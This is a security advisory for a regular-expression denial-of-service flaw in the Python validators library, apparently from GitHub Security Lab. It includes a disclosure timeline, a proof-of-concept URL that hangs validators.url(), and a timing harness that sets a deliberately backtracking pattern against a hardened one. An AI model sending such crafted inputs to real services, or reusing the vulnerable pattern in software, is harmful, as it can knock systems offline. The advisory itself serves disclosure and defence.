Coordinated Disclosure Timeline
- 2021-08-31: Created an issue asking for contact details.
- 2023-03-03: Issue closed.
- 2023-03-07: Confirmed that the poc still works.
- 2023-03-07: Posted a comment asking for contact details.
- 2023-03-08: In response to my comment, @joe733 added a security.md to the repo
- 2023-03-09: I emailed the report to @joe733.
- 2023-03-16: Created a PR to fix the issue: https://github.com/python-validators/validators/pull/243
- 2023-03-17: Received an email from @joe733, notifying that a more comprehensive fix is in progress: https://github.com/python-validators/validators/pull/245
- 2023-03-18: Fix merged: https://github.com/python-validators/validators/pull/245
validators contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
ReDoS, or Regular Expression Denial of Service, is a vulnerability in inefficient regular expressions: a crafted input string forces the backtracking engine through superlinear, often exponential, work before the match fails, so a single request can occupy a worker for an effectively unbounded time.
The vulnerable regular expression is here
Please follow these steps to reproduce the issue:
- Install validators:
```shell
pip3 install validators
```
- Run the code below:
```python
import validators

# Doesn't terminate!
print(validators.url("http://0.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00."))
```
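When confirming a ReDoS report you want the proof of concept to be killable rather than to hang the interpreter, and you want to see the difference between the pattern that backtracks and an equivalent pattern that does not. The harness below is an added example, not code from the GHSL advisory or from the validators project. `VULNERABLE_PATTERN` is a constructed stand-in that fails the same way the advisory describes (overlapping ways to consume a run of `00.` groups); it is not the regular expression in validators, whose text this page does not reproduce. `time_match`, `redos_input` and `probe_validators` are names chosen here; `probe_validators` reuses the advisory's PoC shape and assumes the `validators` package is importable in the child process, reporting an error otherwise.

```python
"""Reproduce a ReDoS candidate in a child process with a wall-clock timeout.

Added example for the advisory above; not part of GHSL's or validators' code.
"""
import subprocess
import sys
import time

# Constructed illustrative pattern (assumption: NOT the regex from validators).
# Each "00." can be consumed either as one iteration "00." or as two iterations
# "0" + "0.", so once the overall match is doomed to fail the engine retries
# about 2**groups combinations before giving up.
VULNERABLE_PATTERN = r"^(?:\d+\.?)+$"

# Same language (digit-led run of digits and dots, no "..", optional trailing
# dot) written so every character can be consumed in exactly one way; there is
# nothing for the engine to retry, so matching is linear in the input length.
HARDENED_PATTERN = r"^\d+(?:\.\d+)*\.?$"

# Child program: match one pattern against one string and print the result.
CHILD = "import re, sys; print(bool(re.match(sys.argv[1], sys.argv[2])))"


def redos_input(groups: int) -> str:
    """Attack string: the PoC's "00." groups plus a trailing character that
    makes the whole match fail, which is what triggers the backtracking."""
    return "00." * groups + "x"


def time_match(pattern: str, text: str, timeout: float) -> dict:
    """Run re.match in a separate Python process so a runaway regex can be
    killed. Returns {"status": "timeout"} or the match result and elapsed time."""
    start = time.perf_counter()
    try:
        proc = subprocess.run(
            [sys.executable, "-c", CHILD, pattern, text],
            capture_output=True, text=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return {"status": "timeout", "seconds": timeout}
    if proc.returncode != 0:
        return {"status": "error", "detail": proc.stderr.strip()}
    return {
        "status": "finished",
        "matched": proc.stdout.strip() == "True",
        "seconds": time.perf_counter() - start,
    }


def probe_validators(groups: int, timeout: float) -> dict:
    """Same check against validators.url() using the advisory's PoC shape
    ("http://0." followed by "00." groups). Assumes the validators package is
    installed in the interpreter running this script; otherwise reports error."""
    url = "http://0." + "00." * groups
    code = "import validators, sys; print(bool(validators.url(sys.argv[1])))"
    start = time.perf_counter()
    try:
        proc = subprocess.run(
            [sys.executable, "-c", code, url],
            capture_output=True, text=True, timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return {"status": "timeout", "seconds": timeout}
    if proc.returncode != 0:
        last = proc.stderr.strip().splitlines()
        return {"status": "error", "detail": last[-1] if last else ""}
    return {
        "status": "finished",
        "matched": proc.stdout.strip() == "True",
        "seconds": time.perf_counter() - start,
    }


if __name__ == "__main__":
    text = redos_input(40)
    print("vulnerable:", time_match(VULNERABLE_PATTERN, text, timeout=2.0))
    print("hardened:  ", time_match(HARDENED_PATTERN, text, timeout=2.0))
    print("validators:", probe_validators(60, timeout=5.0))
```

The child is started with `sys.executable -c` rather than `multiprocessing` so the harness does not depend on the process start method or on the target being picklable, and `subprocess.run` kills the child itself when the timeout expires. Running it reports a timeout for the constructed vulnerable pattern at 40 groups, an immediate non-match for the hardened pattern on the same string, and, for `validators`, either a timeout (affected version), a quick result (fixed version) or an error line if the package is missing.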
This vulnerability was found by the CodeQL ReDoS query for Python, which was still experimental when it found this bug in 2021, but is now included in the standard suite of queries used by code scanning.
This issue may lead to a denial of service.
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
You can contact the GHSL team at
email@example.com, please include a reference to
GHSL-2021-110 in any communication regarding this issue.